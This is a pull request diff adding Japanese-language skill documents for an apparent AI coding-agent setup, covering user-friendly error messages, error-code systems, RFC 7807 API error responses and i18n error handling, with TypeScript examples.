### PR TITLE
feat(skills): Add 5 schema-def skills and refactor agent

### DIFF
--- a/.claude/agents/agent_list.md
+++ b/.claude/agents/agent_list.md
@@ -281,13 +281,13 @@
   - [ ] バリデーションエラー時のメッセージは親切か？
 - **成果物:** `schema.ts` (各機能毎)
 - **必要なスキル**:
-  | スキル名 | 概要 |
-  | ------------------------ | ----------------------------------------------------- |
-  | **zod-validation** | Zod スキーマ定義、型推論、カスタムバリデーション |
-  | **type-safety-patterns** | TypeScript 厳格モード、型ガード、Discriminated Unions |
-  | **input-sanitization** | XSS 対策、SQL インジェクション対策、エスケープ処理 |
-  | **error-message-design** | ユーザーフレンドリーなエラーメッセージ、i18n 対応 |
-  | **json-schema** | JSON Schema 仕様、スキーマバージョニング |
+  | スキル名 | パス | 概要 |
+  | ------------------------ | ----------------------------------------- | ----------------------------------------------------- |
+  | **zod-validation** | `.claude/skills/zod-validation/SKILL.md` | Zod スキーマ定義、型推論、カスタムバリデーション |
+  | **type-safety-patterns** | `.claude/skills/type-safety-patterns/SKILL.md` | TypeScript 厳格モード、型ガード、Discriminated Unions |
+  | **input-sanitization** | `.claude/skills/input-sanitization/SKILL.md` | XSS 対策、SQL インジェクション対策、エスケープ処理 |
+  | **error-message-design** | `.claude/skills/error-message-design/SKILL.md` | ユーザーフレンドリーなエラーメッセージ、i18n 対応 |
+  | **json-schema** | `.claude/skills/json-schema/SKILL.md` | JSON Schema 仕様、スキーマバージョニング |
 
 #### 12. ビジネスロジック実装
 

--- a/.claude/skills/error-message-design/SKILL.md
+++ b/.claude/skills/error-message-design/SKILL.md
@@ -1,0 +1,272 @@
+---
+name: error-message-design
+description: |
+  ユーザーフレンドリーなエラーメッセージの設計を専門とするスキル。
+  エラーコード体系、多言語対応（i18n）、アクション指向のメッセージ設計を
+  通じて、ユーザー体験を向上させます。
+
+  専門分野:
+  - エラーコード体系: 階層的コード、カテゴリ分類
+  - メッセージ設計: アクション指向、コンテキスト考慮
+  - i18n対応: 多言語化、文化的配慮
+  - 開発者向けエラー: デバッグ情報、スタックトレース
+
+  使用タイミング:
+  - バリデーションエラーメッセージの設計時
+  - APIエラーレスポンスの設計時
+  - 多言語対応のエラーシステム構築時
+  - ユーザー向け/開発者向けエラーの分離時
+
+  Use proactively when designing validation error messages,
+  API error responses, or building i18n-ready error systems.
+version: 1.0.0
+---
+
+# Error Message Design
+
+## 概要
+
+このスキルは、ユーザーフレンドリーなエラーメッセージの設計パターンを提供します。
+エラーコード体系、多言語対応、アクション指向のメッセージ設計を通じて、
+エラー発生時もユーザーが次のアクションを取れるようにします。
+
+**主要な価値**:
+- ユーザーが理解しやすいエラーメッセージ
+- 開発者がデバッグしやすい情報提供
+- 多言語・多文化対応
+- 一貫したエラーハンドリング
+
+**対象ユーザー**:
+- スキーマ定義を行うエージェント（@schema-def）
+- APIを設計する開発者
+- フロントエンド開発者
+
+## リソース構造
+
+```
+error-message-design/
+├── SKILL.md                                    # 本ファイル
+├── resources/
+│   ├── error-code-system.md                   # エラーコード体系
+│   ├── user-friendly-messages.md              # ユーザーフレンドリーメッセージ
+│   ├── i18n-error-handling.md                 # 多言語対応
+│   └── api-error-responses.md                 # APIエラーレスポンス
+├── scripts/
+│   └── validate-error-messages.mjs            # エラーメッセージ検証
+└── templates/
+    └── error-system-template.ts               # エラーシステムテンプレート
+```
+
+## コマンドリファレンス
+
+### リソース読み取り
+
+```bash
+# エラーコード体系
+cat .claude/skills/error-message-design/resources/error-code-system.md
+
+# ユーザーフレンドリーメッセージ
+cat .claude/skills/error-message-design/resources/user-friendly-messages.md
+
+# 多言語対応
+cat .claude/skills/error-message-design/resources/i18n-error-handling.md
+
+# APIエラーレスポンス
+cat .claude/skills/error-message-design/resources/api-error-responses.md
+```
+
+### スクリプト実行
+
+```bash
+# エラーメッセージ検証
+node .claude/skills/error-message-design/scripts/validate-error-messages.mjs <messages.json>
+```
+
+### テンプレート参照
+
+```bash
+# エラーシステムテンプレート
+cat .claude/skills/error-message-design/templates/error-system-template.ts
+```
+
+## いつ使うか
+
+### シナリオ1: フォームバリデーション
+**状況**: ユーザー入力のバリデーションエラーを表示する
+
+**適用条件**:
+- [ ] 複数のフィールドでエラーが発生し得る
+- [ ] ユーザーが修正方法を理解する必要がある
+- [ ] 多言語対応が必要
+
+**期待される成果**: 分かりやすいバリデーションエラー表示
+
+### シナリオ2: APIエラーレスポンス
+**状況**: APIクライアントにエラー情報を返す
+
+**適用条件**:
+- [ ] HTTPステータスコードの選択
+- [ ] エラーコードの体系化
+- [ ] 開発者向けデバッグ情報の提供
+
+**期待される成果**: 一貫したAPIエラーレスポンス
+
+### シナリオ3: エラーの国際化
+**状況**: 多言語対応のアプリケーションでエラーを表示
+
+**適用条件**:
+- [ ] 複数の言語でエラーメッセージを表示
+- [ ] 文化的な配慮が必要
+- [ ] メッセージの動的な組み立て
+
+**期待される成果**: 自然な多言語エラーメッセージ
+
+## 基本概念
+
+### エラーメッセージの3要素
+
+```typescript
+// 良いエラーメッセージの構成要素
+interface UserFriendlyError {
+  // 1. 何が起きたか
+  title: string;
+  // 例: "メールアドレスが正しくありません"
+
+  // 2. なぜ起きたか
+  reason: string;
+  // 例: "入力された形式がメールアドレスとして認識できません"
+
+  // 3. どうすればいいか
+  action: string;
+  // 例: "example@domain.com のような形式で入力してください"
+}
+```
+
+### 悪いエラーメッセージ vs 良いエラーメッセージ
+
+```typescript
+// ❌ 悪い例
+const badErrors = [
+  "Error",
+  "Invalid input",
+  "Something went wrong",
+  "エラーが発生しました",
+  "入力が不正です",
+];
+
+// ✅ 良い例
+const goodErrors = [
+  {
+    bad: "Invalid email",
+    good: {
+      title: "メールアドレスの形式が正しくありません",
+      action: "例: taro@example.com",
+    },
+  },
+  {
+    bad: "Password too short",
+    good: {
+      title: "パスワードは8文字以上必要です",
+      hint: "現在: 5文字",
+      action: "あと3文字追加してください",
+    },
+  },
+  {
+    bad: "Network error",
+    good: {
+      title: "サーバーに接続できません",
+      reason: "ネットワーク接続を確認してください",
+      action: "接続を確認してから、もう一度お試しください",
+    },
+  },
+];
+```
+
+### エラーコード体系
+
+```typescript
+// エラーコードの階層構造
+const ERROR_CODES = {
+  // カテゴリ: AUTH (認証)
+  AUTH_001: "認証が必要です",
+  AUTH_002: "セッションの有効期限が切れました",
+  AUTH_003: "アクセス権限がありません",
+
+  // カテゴリ: VALIDATION (バリデーション)
+  VAL_001: "必須項目が入力されていません",
+  VAL_002: "形式が正しくありません",
+  VAL_003: "値が範囲外です",
+
+  // カテゴリ: RESOURCE (リソース)
+  RES_001: "リソースが見つかりません",
+  RES_002: "リソースが既に存在します",
+  RES_003: "リソースが使用中です",
+} as const;
+
+type ErrorCode = keyof typeof ERROR_CODES;
+```
+
+### APIエラーレスポンス
+
+```typescript
+// RFC 7807 Problem Details準拠
+interface ApiError {
+  type: string;           // エラータイプのURI
+  title: string;          // 人間が読めるタイトル
+  status: number;         // HTTPステータスコード
+  detail?: string;        // 詳細な説明
+  instance?: string;      // このエラー発生のURI
+  code?: string;          // アプリケーション固有のエラーコード
+  errors?: FieldError[];  // フィールド別エラー（バリデーション用）
+}
+
+interface FieldError {
+  field: string;          // フィールド名
+  message: string;        // エラーメッセージ
+  code?: string;          // エラーコード
+}
+
+// 使用例
+const validationError: ApiError = {
+  type: "https://api.example.com/errors/validation",
+  title: "入力内容に問題があります",
+  status: 400,
+  detail: "以下のフィールドを確認してください",
+  code: "VAL_001",
+  errors: [
+    { field: "email", message: "有効なメールアドレスを入力してください", code: "VAL_EMAIL" },
+    { field: "password", message: "パスワードは8文字以上必要です", code: "VAL_PASSWORD_LENGTH" },
+  ],
+};
+```
+
+## 判断基準チェックリスト
+
+### メッセージ設計時
+- [ ] ユーザーが何をすべきか明確か？
+- [ ] 技術用語を使っていないか？
+- [ ] エラーの原因が分かるか？
+- [ ] 解決方法が提示されているか？
+
+### コード体系設計時
+- [ ] エラーコードは一意か？
+- [ ] カテゴリ分類は適切か？
+- [ ] ドキュメント化されているか？
+- [ ] ログで追跡可能か？
+
+### 多言語対応時
+- [ ] プレースホルダーは適切に配置されているか？
+- [ ] 語順の違いに対応しているか？
+- [ ] 文化的な配慮がされているか？
+
+## 関連スキル
+
+- `.claude/skills/zod-validation/SKILL.md` - Zodバリデーション
+- `.claude/skills/type-safety-patterns/SKILL.md` - 型安全性パターン
+- `.claude/skills/input-sanitization/SKILL.md` - 入力サニタイズ
+
+## 変更履歴
+
+| バージョン | 日付 | 変更内容 |
+|-----------|------|---------|
+| 1.0.0 | 2025-11-25 | 初版リリース - エラーメッセージ設計の基本を網羅 |

--- a/.claude/skills/error-message-design/resources/api-error-responses.md
+++ b/.claude/skills/error-message-design/resources/api-error-responses.md
@@ -1,0 +1,451 @@
+# APIエラーレスポンス
+
+## 概要
+
+RESTful APIにおけるエラーレスポンスの設計パターンを解説します。
+RFC 7807準拠のフォーマットから、バリデーションエラー、認証エラーまで網羅します。
+
+## RFC 7807 Problem Details
+
+### 基本フォーマット
+
+```typescript
+interface ProblemDetails {
+  type: string;        // エラータイプを識別するURI
+  title: string;       // 人間が読める短いタイトル
+  status: number;      // HTTPステータスコード
+  detail?: string;     // より詳細な説明
+  instance?: string;   // この特定のエラー発生を識別するURI
+}
+```
+
+### 実装例
+
+```typescript
+// 基本的なProblemDetailsレスポンス
+const notFoundError = {
+  type: 'https://api.example.com/errors/not-found',
+  title: 'Resource Not Found',
+  status: 404,
+  detail: 'The requested user with ID 123 was not found',
+  instance: '/users/123',
+};
+
+// 拡張フィールド付き
+interface ExtendedProblemDetails extends ProblemDetails {
+  code?: string;              // アプリケーション固有のエラーコード
+  errors?: ValidationError[]; // フィールド別エラー
+  timestamp?: string;         // エラー発生時刻
+  traceId?: string;          // リクエスト追跡ID
+}
+
+const validationError: ExtendedProblemDetails = {
+  type: 'https://api.example.com/errors/validation',
+  title: 'Validation Failed',
+  status: 400,
+  detail: 'The request body contains invalid fields',
+  code: 'VAL_001',
+  timestamp: new Date().toISOString(),
+  traceId: 'abc-123-def',
+  errors: [
+    { field: 'email', message: 'Invalid email format', code: 'VAL_EMAIL' },
+    { field: 'age', message: 'Must be a positive number', code: 'VAL_POSITIVE' },
+  ],
+};
+```
+
+## HTTPステータスコード
+
+### クライアントエラー（4xx）
+
+```typescript
+const CLIENT_ERRORS = {
+  // 400 Bad Request - 不正なリクエスト
+  badRequest: {
+    status: 400,
+    type: 'bad-request',
+    title: 'Bad Request',
+    detail: 'The request could not be understood',
+  },
+
+  // 401 Unauthorized - 認証が必要
+  unauthorized: {
+    status: 401,
+    type: 'unauthorized',
+    title: 'Unauthorized',
+    detail: 'Authentication is required',
+  },
+
+  // 403 Forbidden - アクセス禁止
+  forbidden: {
+    status: 403,
+    type: 'forbidden',
+    title: 'Forbidden',
+    detail: 'You do not have permission to access this resource',
+  },
+
+  // 404 Not Found - リソースが存在しない
+  notFound: {
+    status: 404,
+    type: 'not-found',
+    title: 'Not Found',
+    detail: 'The requested resource was not found',
+  },
+
+  // 409 Conflict - 競合
+  conflict: {
+    status: 409,
+    type: 'conflict',
+    title: 'Conflict',
+    detail: 'The request conflicts with the current state',
+  },
+
+  // 422 Unprocessable Entity - 処理できないエンティティ
+  unprocessableEntity: {
+    status: 422,
+    type: 'unprocessable-entity',
+    title: 'Unprocessable Entity',
+    detail: 'The request was well-formed but semantically incorrect',
+  },
+
+  // 429 Too Many Requests - レート制限
+  tooManyRequests: {
+    status: 429,
+    type: 'too-many-requests',
+    title: 'Too Many Requests',
+    detail: 'Rate limit exceeded',
+  },
+};
+```
+
+### サーバーエラー（5xx）
+
+```typescript
+const SERVER_ERRORS = {
+  // 500 Internal Server Error
+  internalError: {
+    status: 500,
+    type: 'internal-error',
+    title: 'Internal Server Error',
+    detail: 'An unexpected error occurred',
+  },
+
+  // 502 Bad Gateway
+  badGateway: {
+    status: 502,
+    type: 'bad-gateway',
+    title: 'Bad Gateway',
+    detail: 'Invalid response from upstream server',
+  },
+
+  // 503 Service Unavailable
+  serviceUnavailable: {
+    status: 503,
+    type: 'service-unavailable',
+    title: 'Service Unavailable',
+    detail: 'The service is temporarily unavailable',
+  },
+};
+```
+
+## エラーレスポンスの実装
+
+### Express.js
+
+```typescript
+import { Request, Response, NextFunction } from 'express';
+
+// エラークラス
+class ApiError extends Error {
+  constructor(
+    public status: number,
+    public code: string,
+    public detail: string,
+    public errors?: ValidationError[]
+  ) {
+    super(detail);
+    this.name = 'ApiError';
+  }
+
+  toResponse(req: Request): ExtendedProblemDetails {
+    return {
+      type: `${req.protocol}://${req.get('host')}/errors/${this.code.toLowerCase()}`,
+      title: this.getTitle(),
+      status: this.status,
+      detail: this.detail,
+      code: this.code,
+      instance: req.originalUrl,
+      timestamp: new Date().toISOString(),
+      errors: this.errors,
+    };
+  }
+
+  private getTitle(): string {
+    const titles: Record<number, string> = {
+      400: 'Bad Request',
+      401: 'Unauthorized',
+      403: 'Forbidden',
+      404: 'Not Found',
+      409: 'Conflict',
+      422: 'Validation Error',
+      429: 'Too Many Requests',
+      500: 'Internal Server Error',
+    };
+    return titles[this.status] || 'Error';
+  }
+}
+
+// エラーハンドラーミドルウェア
+function errorHandler(
+  err: Error,
+  req: Request,
+  res: Response,
+  next: NextFunction
+) {
+  // ログ出力
+  console.error({
+    timestamp: new Date().toISOString(),
+    error: err.message,
+    stack: err.stack,
+    path: req.originalUrl,
+    method: req.method,
+  });
+
+  if (err instanceof ApiError) {
+    return res
+      .status(err.status)
+      .type('application/problem+json')
+      .json(err.toResponse(req));
+  }
+
+  // 予期しないエラー
+  return res
+    .status(500)
+    .type('application/problem+json')
+    .json({
+      type: `${req.protocol}://${req.get('host')}/errors/internal`,
+      title: 'Internal Server Error',
+      status: 500,
+      detail: 'An unexpected error occurred',
+      instance: req.originalUrl,
+      timestamp: new Date().toISOString(),
+    });
+}
+```
+
+### バリデーションエラー
+
+```typescript
+import { z } from 'zod';
+
+// Zodエラーを変換
+function fromZodError(error: z.ZodError): ApiError {
+  const errors = error.errors.map((err) => ({
+    field: err.path.join('.'),
+    message: err.message,
+    code: `VAL_${err.code.toUpperCase()}`,
+  }));
+
+  return new ApiError(
+    400,
+    'VALIDATION_ERROR',
+    'One or more fields have validation errors',
+    errors
+  );
+}
+
+// 使用例
+app.post('/users', async (req, res, next) => {
+  try {
+    const data = UserCreateSchema.parse(req.body);
+    // ...
+  } catch (err) {
+    if (err instanceof z.ZodError) {
+      return next(fromZodError(err));
+    }
+    next(err);
+  }
+});
+```
+
+## 認証・認可エラー
+
+```typescript
+// 認証エラー
+class AuthenticationError extends ApiError {
+  constructor(detail = 'Authentication required') {
+    super(401, 'AUTH_REQUIRED', detail);
+  }
+}
+
+// トークン期限切れ
+class TokenExpiredError extends ApiError {
+  constructor() {
+    super(401, 'TOKEN_EXPIRED', 'Access token has expired');
+  }
+}
+
+// 権限不足
+class ForbiddenError extends ApiError {
+  constructor(resource: string) {
+    super(403, 'FORBIDDEN', `You do not have permission to access ${resource}`);
+  }
+}
+
+// 認証ミドルウェア
+function authMiddleware(req: Request, res: Response, next: NextFunction) {
+  const token = req.headers.authorization?.replace('Bearer ', '');
+
+  if (!token) {
+    return next(new AuthenticationError());
+  }
+
+  try {
+    const decoded = verifyToken(token);
+    req.user = decoded;
+    next();
+  } catch (err) {
+    if (err.name === 'TokenExpiredError') {
+      return next(new TokenExpiredError());
+    }
+    return next(new AuthenticationError('Invalid token'));
+  }
+}
+```
+
+## レート制限エラー
+
+```typescript
+interface RateLimitInfo {
+  limit: number;
+  remaining: number;
+  reset: Date;
+}
+
+class RateLimitError extends ApiError {
+  constructor(public rateLimitInfo: RateLimitInfo) {
+    super(429, 'RATE_LIMITED', 'Too many requests');
+  }
+
+  toResponse(req: Request): ExtendedProblemDetails {
+    return {
+      ...super.toResponse(req),
+      retryAfter: Math.ceil((this.rateLimitInfo.reset.getTime() - Date.now()) / 1000),
+      rateLimit: {
+        limit: this.rateLimitInfo.limit,
+        remaining: this.rateLimitInfo.remaining,
+        reset: this.rateLimitInfo.reset.toISOString(),
+      },
+    };
+  }
+}
+
+// レスポンスヘッダーにも設定
+function setRateLimitHeaders(res: Response, info: RateLimitInfo) {
+  res.setHeader('X-RateLimit-Limit', info.limit);
+  res.setHeader('X-RateLimit-Remaining', info.remaining);
+  res.setHeader('X-RateLimit-Reset', info.reset.toISOString());
+}
+```
+
+## 環境別のエラー詳細度
+
+```typescript
+// 開発環境ではスタックトレースを含める
+function formatError(err: Error, req: Request): ExtendedProblemDetails {
+  const base: ExtendedProblemDetails = {
+    type: 'https://api.example.com/errors/internal',
+    title: 'Internal Server Error',
+    status: 500,
+    detail: 'An unexpected error occurred',
+    instance: req.originalUrl,
+    timestamp: new Date().toISOString(),
+  };
+
+  if (process.env.NODE_ENV === 'development') {
+    return {
+      ...base,
+      detail: err.message,
+      stack: err.stack?.split('\n'),
+      cause: err.cause,
+    };
+  }
+
+  return base;
+}
+```
+
+## クライアント側のエラーハンドリング
+
+```typescript
+// APIクライアント
+class ApiClient {
+  async request<T>(url: string, options?: RequestInit): Promise<T> {
+    const response = await fetch(url, options);
+
+    if (!response.ok) {
+      const error = await response.json() as ExtendedProblemDetails;
+      throw new ApiResponseError(error);
+    }
+
+    return response.json();
+  }
+}
+
+class ApiResponseError extends Error {
+  constructor(public problem: ExtendedProblemDetails) {
+    super(problem.detail || problem.title);
+    this.name = 'ApiResponseError';
+  }
+
+  get status(): number {
+    return this.problem.status;
+  }
+
+  get code(): string | undefined {
+    return this.problem.code;
+  }
+
+  get validationErrors(): ValidationError[] | undefined {
+    return this.problem.errors;
+  }
+
+  isValidationError(): boolean {
+    return this.status === 400 && !!this.problem.errors;
+  }
+
+  isAuthError(): boolean {
+    return this.status === 401;
+  }
+
+  isNotFound(): boolean {
+    return this.status === 404;
+  }
+}
+
+// 使用例
+try {
+  await apiClient.request('/users', { method: 'POST', body });
+} catch (err) {
+  if (err instanceof ApiResponseError) {
+    if (err.isValidationError()) {
+      // フィールドエラーを表示
+      err.validationErrors?.forEach((e) => {
+        setFieldError(e.field, e.message);
+      });
+    } else if (err.isAuthError()) {
+      // ログインページへリダイレクト
+      router.push('/login');
+    } else {
+      // 一般的なエラー表示
+      showToast({ type: 'error', message: err.message });
+    }
+  }
+}
+```
+
+## 変更履歴
+
+| バージョン | 日付 | 変更内容 |
+|-----------|------|---------|
+| 1.0.0 | 2025-11-25 | 初版リリース |

--- a/.claude/skills/error-message-design/resources/error-code-system.md
+++ b/.claude/skills/error-message-design/resources/error-code-system.md
@@ -1,0 +1,382 @@
+# エラーコード体系
+
+## 概要
+
+一貫性のあるエラーコード体系の設計方法を解説します。
+適切なコード体系により、エラーの分類、追跡、ドキュメント化が容易になります。
+
+## コード体系の設計原則
+
+### 階層構造
+
+```
+[カテゴリ]_[サブカテゴリ]_[番号]
+
+例:
+- AUTH_SESSION_001 : 認証 > セッション > エラー番号001
+- VAL_EMAIL_001    : バリデーション > メール > エラー番号001
+- SYS_DB_001       : システム > データベース > エラー番号001
+```
+
+### カテゴリ一覧
+
+| コード | カテゴリ | 説明 |
+|-------|---------|-----|
+| AUTH | 認証・認可 | ログイン、セッション、権限 |
+| VAL | バリデーション | 入力検証、形式チェック |
+| RES | リソース | CRUD操作、存在確認 |
+| SYS | システム | サーバー、DB、外部サービス |
+| NET | ネットワーク | 通信、タイムアウト |
+| BIZ | ビジネス | 業務ロジック固有 |
+| FILE | ファイル | アップロード、形式 |
+| RATE | レート制限 | API制限、スロットリング |
+
+## 実装パターン
+
+### 基本的なエラーコード定義
+
+```typescript
+// エラーコードの型定義
+type ErrorCategory = 'AUTH' | 'VAL' | 'RES' | 'SYS' | 'NET' | 'BIZ' | 'FILE' | 'RATE';
+
+interface ErrorDefinition {
+  code: string;
+  category: ErrorCategory;
+  message: string;
+  httpStatus: number;
+  userMessage: string;
+  action?: string;
+}
+
+// エラーコード定義
+const ERROR_CODES = {
+  // 認証系
+  AUTH_REQUIRED: {
+    code: 'AUTH_001',
+    category: 'AUTH',
+    message: 'Authentication required',
+    httpStatus: 401,
+    userMessage: 'ログインが必要です',
+    action: 'ログインしてからもう一度お試しください',
+  },
+  AUTH_SESSION_EXPIRED: {
+    code: 'AUTH_002',
+    category: 'AUTH',
+    message: 'Session expired',
+    httpStatus: 401,
+    userMessage: 'セッションの有効期限が切れました',
+    action: '再度ログインしてください',
+  },
+  AUTH_FORBIDDEN: {
+    code: 'AUTH_003',
+    category: 'AUTH',
+    message: 'Access forbidden',
+    httpStatus: 403,
+    userMessage: 'この操作を行う権限がありません',
+    action: '管理者にお問い合わせください',
+  },
+
+  // バリデーション系
+  VAL_REQUIRED: {
+    code: 'VAL_001',
+    category: 'VAL',
+    message: 'Required field missing',
+    httpStatus: 400,
+    userMessage: '必須項目が入力されていません',
+  },
+  VAL_FORMAT: {
+    code: 'VAL_002',
+    category: 'VAL',
+    message: 'Invalid format',
+    httpStatus: 400,
+    userMessage: '入力形式が正しくありません',
+  },
+  VAL_RANGE: {
+    code: 'VAL_003',
+    category: 'VAL',
+    message: 'Value out of range',
+    httpStatus: 400,
+    userMessage: '値が許容範囲外です',
+  },
+
+  // リソース系
+  RES_NOT_FOUND: {
+    code: 'RES_001',
+    category: 'RES',
+    message: 'Resource not found',
+    httpStatus: 404,
+    userMessage: 'お探しのデータが見つかりません',
+    action: 'URLを確認するか、一覧から選択してください',
+  },
+  RES_ALREADY_EXISTS: {
+    code: 'RES_002',
+    category: 'RES',
+    message: 'Resource already exists',
+    httpStatus: 409,
+    userMessage: '同じデータが既に存在します',
+    action: '別の値を入力してください',
+  },
+  RES_IN_USE: {
+    code: 'RES_003',
+    category: 'RES',
+    message: 'Resource in use',
+    httpStatus: 409,
+    userMessage: 'このデータは使用中のため削除できません',
+    action: '関連するデータを先に削除してください',
+  },
+
+  // システム系
+  SYS_INTERNAL: {
+    code: 'SYS_001',
+    category: 'SYS',
+    message: 'Internal server error',
+    httpStatus: 500,
+    userMessage: 'システムエラーが発生しました',
+    action: 'しばらく待ってからもう一度お試しください',
+  },
+  SYS_DB_ERROR: {
+    code: 'SYS_002',
+    category: 'SYS',
+    message: 'Database error',
+    httpStatus: 500,
+    userMessage: 'データベースエラーが発生しました',
+    action: 'しばらく待ってからもう一度お試しください',
+  },
+  SYS_MAINTENANCE: {
+    code: 'SYS_003',
+    category: 'SYS',
+    message: 'Service under maintenance',
+    httpStatus: 503,
+    userMessage: 'ただいまメンテナンス中です',
+    action: 'メンテナンス終了後にアクセスしてください',
+  },
+} as const;
+
+type ErrorCodeKey = keyof typeof ERROR_CODES;
+```
+
+### エラークラスの実装
+
+```typescript
+class AppError extends Error {
+  readonly code: string;
+  readonly category: ErrorCategory;
+  readonly httpStatus: number;
+  readonly userMessage: string;
+  readonly action?: string;
+  readonly details?: Record<string, unknown>;
+
+  constructor(
+    errorKey: ErrorCodeKey,
+    options?: {
+      details?: Record<string, unknown>;
+      cause?: Error;
+    }
+  ) {
+    const def = ERROR_CODES[errorKey];
+    super(def.message);
+
+    this.name = 'AppError';
+    this.code = def.code;
+    this.category = def.category;
+    this.httpStatus = def.httpStatus;
+    this.userMessage = def.userMessage;
+    this.action = def.action;
+    this.details = options?.details;
+    this.cause = options?.cause;
+
+    Error.captureStackTrace(this, this.constructor);
+  }
+
+  toJSON(): Record<string, unknown> {
+    return {
+      code: this.code,
+      message: this.userMessage,
+      action: this.action,
+      details: this.details,
+    };
+  }
+}
+
+// 使用例
+throw new AppError('AUTH_SESSION_EXPIRED');
+throw new AppError('VAL_REQUIRED', {
+  details: { field: 'email' },
+});
+```
+
+### バリデーションエラーの拡張
+
+```typescript
+interface FieldError {
+  field: string;
+  code: string;
+  message: string;
+  value?: unknown;
+}
+
+class ValidationError extends AppError {
+  readonly fieldErrors: FieldError[];
+
+  constructor(fieldErrors: FieldError[]) {
+    super('VAL_FORMAT', {
+      details: { errors: fieldErrors },
+    });
+    this.fieldErrors = fieldErrors;
+  }
+
+  static fromZodError(zodError: z.ZodError): ValidationError {
+    const fieldErrors = zodError.errors.map((err) => ({
+      field: err.path.join('.'),
+      code: `VAL_${err.code.toUpperCase()}`,
+      message: err.message,
+    }));
+    return new ValidationError(fieldErrors);
+  }
+}
+```
+
+## HTTPステータスコードマッピング
+
+```typescript
+const STATUS_CODE_MAP: Record<ErrorCategory, number> = {
+  AUTH: 401,
+  VAL: 400,
+  RES: 404,
+  SYS: 500,
+  NET: 503,
+  BIZ: 422,
+  FILE: 400,
+  RATE: 429,
+};
+
+// より詳細なマッピング
+const HTTP_STATUS = {
+  // 4xx クライアントエラー
+  400: 'Bad Request',
+  401: 'Unauthorized',
+  403: 'Forbidden',
+  404: 'Not Found',
+  409: 'Conflict',
+  422: 'Unprocessable Entity',
+  429: 'Too Many Requests',
+
+  // 5xx サーバーエラー
+  500: 'Internal Server Error',
+  502: 'Bad Gateway',
+  503: 'Service Unavailable',
+  504: 'Gateway Timeout',
+} as const;
+```
+
+## エラーコードの管理
+
+### エラーコードレジストリ
+
+```typescript
+class ErrorCodeRegistry {
+  private static codes = new Map<string, ErrorDefinition>();
+
+  static register(definition: ErrorDefinition): void {
+    if (this.codes.has(definition.code)) {
+      throw new Error(`Duplicate error code: ${definition.code}`);
+    }
+    this.codes.set(definition.code, definition);
+  }
+
+  static get(code: string): ErrorDefinition | undefined {
+    return this.codes.get(code);
+  }
+
+  static getByCategory(category: ErrorCategory): ErrorDefinition[] {
+    return Array.from(this.codes.values())
+      .filter((def) => def.category === category);
+  }
+
+  static exportAll(): ErrorDefinition[] {
+    return Array.from(this.codes.values());
+  }
+}
+
+// 初期化
+Object.values(ERROR_CODES).forEach((def) => {
+  ErrorCodeRegistry.register(def);
+});
+```
+
+### エラーコードドキュメント生成
+
+```typescript
+function generateErrorDocumentation(): string {
+  const errors = ErrorCodeRegistry.exportAll();
+  const grouped = errors.reduce((acc, err) => {
+    if (!acc[err.category]) acc[err.category] = [];
+    acc[err.category].push(err);
+    return acc;
+  }, {} as Record<ErrorCategory, ErrorDefinition[]>);
+
+  let doc = '# エラーコード一覧\n\n';
+
+  for (const [category, defs] of Object.entries(grouped)) {
+    doc += `## ${category}\n\n`;
+    doc += '| コード | HTTPステータス | メッセージ | ユーザー向けメッセージ |\n';
+    doc += '|--------|--------------|----------|--------------------|\n';
+
+    for (const def of defs) {
+      doc += `| ${def.code} | ${def.httpStatus} | ${def.message} | ${def.userMessage} |\n`;
+    }
+
+    doc += '\n';
+  }
+
+  return doc;
+}
+```
+
+## ベストプラクティス
+
+### 1. コードの一意性を保証
+
+```typescript
+// ✅ 重複チェック付きの登録
+function registerErrorCode(def: ErrorDefinition): void {
+  if (ErrorCodeRegistry.get(def.code)) {
+    throw new Error(`Error code ${def.code} is already registered`);
+  }
+  ErrorCodeRegistry.register(def);
+}
+```
+
+### 2. 追跡可能なコード
+
+```typescript
+// ✅ ログにエラーコードを含める
+function logError(error: AppError, requestId: string): void {
+  console.error(JSON.stringify({
+    timestamp: new Date().toISOString(),
+    requestId,
+    errorCode: error.code,
+    category: error.category,
+    message: error.message,
+    details: error.details,
+    stack: error.stack,
+  }));
+}
+```
+
+### 3. バージョン管理
+
+```typescript
+// エラーコードにバージョンを含める（大規模システム向け）
+const ERROR_CODE_V2 = {
+  'AUTH_001_V2': {
+    // 新しいバージョンのエラー定義
+  },
+} as const;
+```
+
+## 変更履歴
+
+| バージョン | 日付 | 変更内容 |
+|-----------|------|---------|
+| 1.0.0 | 2025-11-25 | 初版リリース |

--- a/.claude/skills/error-message-design/resources/i18n-error-handling.md
+++ b/.claude/skills/error-message-design/resources/i18n-error-handling.md
@@ -1,0 +1,407 @@
+# 多言語対応エラーハンドリング（i18n）
+
+## 概要
+
+国際化（i18n）対応のエラーメッセージシステムの設計方法を解説します。
+プレースホルダー、複数形、文化的配慮を含む包括的なアプローチを提供します。
+
+## 基本的な翻訳構造
+
+### メッセージファイル構造
+
+```
+locales/
+├── ja/
+│   └── errors.json
+├── en/
+│   └── errors.json
+├── zh/
+│   └── errors.json
+└── ko/
+    └── errors.json
+```
+
+### JSONメッセージ形式
+
+```json
+// locales/ja/errors.json
+{
+  "validation": {
+    "required": "{field}は必須です",
+    "email": "有効なメールアドレスを入力してください",
+    "minLength": "{field}は{min}文字以上で入力してください",
+    "maxLength": "{field}は{max}文字以内で入力してください",
+    "pattern": "{field}の形式が正しくありません"
+  },
+  "auth": {
+    "loginRequired": "ログインが必要です",
+    "sessionExpired": "セッションの有効期限が切れました",
+    "invalidCredentials": "メールアドレスまたはパスワードが正しくありません"
+  },
+  "system": {
+    "serverError": "サーバーエラーが発生しました",
+    "maintenance": "ただいまメンテナンス中です"
+  }
+}
+```
+
+```json
+// locales/en/errors.json
+{
+  "validation": {
+    "required": "{field} is required",
+    "email": "Please enter a valid email address",
+    "minLength": "{field} must be at least {min} characters",
+    "maxLength": "{field} must be no more than {max} characters",
+    "pattern": "{field} format is invalid"
+  },
+  "auth": {
+    "loginRequired": "Please log in to continue",
+    "sessionExpired": "Your session has expired",
+    "invalidCredentials": "Invalid email or password"
+  },
+  "system": {
+    "serverError": "A server error occurred",
+    "maintenance": "Service is under maintenance"
+  }
+}
+```
+
+## i18nライブラリの活用
+
+### i18next（推奨）
+
+```typescript
+import i18next from 'i18next';
+
+// 初期化
+await i18next.init({
+  lng: 'ja',
+  fallbackLng: 'en',
+  resources: {
+    ja: {
+      errors: require('./locales/ja/errors.json'),
+    },
+    en: {
+      errors: require('./locales/en/errors.json'),
+    },
+  },
+  interpolation: {
+    escapeValue: false,
+  },
+});
+
+// 使用例
+function translateError(key: string, params?: Record<string, unknown>): string {
+  return i18next.t(`errors:${key}`, params);
+}
+
+// 例
